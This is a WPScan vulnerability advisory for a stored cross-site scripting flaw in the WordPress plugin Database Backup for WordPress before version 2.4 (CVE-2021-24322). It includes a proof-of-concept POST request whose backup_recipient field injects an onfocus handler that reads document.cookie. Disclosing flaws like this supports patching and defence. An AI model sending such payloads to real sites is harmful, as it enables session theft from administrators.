WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)

Description

The plugin did not escape the backup_recipient POST parameter in before output it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue.

Proof of Concept

POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
Cookie: [admin cookies]

_wpnonce=88a432b100&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21

Affects Plugins

wp-db-backup
Fixed in version 2.4

References

CVE
CVE-2021-24322
URL
https://m0ze.ru/vulnerability/%5B2021-04-04%5D-%5BWordPress%5D-%5BCWE-79%5D-WP-DB-Backup-WordPress-Plugin-v2.3.3.txt

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
6bea6301-0762-45c3-a4eb-15d6ac4f9f37

Timeline

Publicly Published

2021-05-16 (about 2 years ago)

Added

2021-05-16 (about 2 years ago)

Last Updated

2021-05-17 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin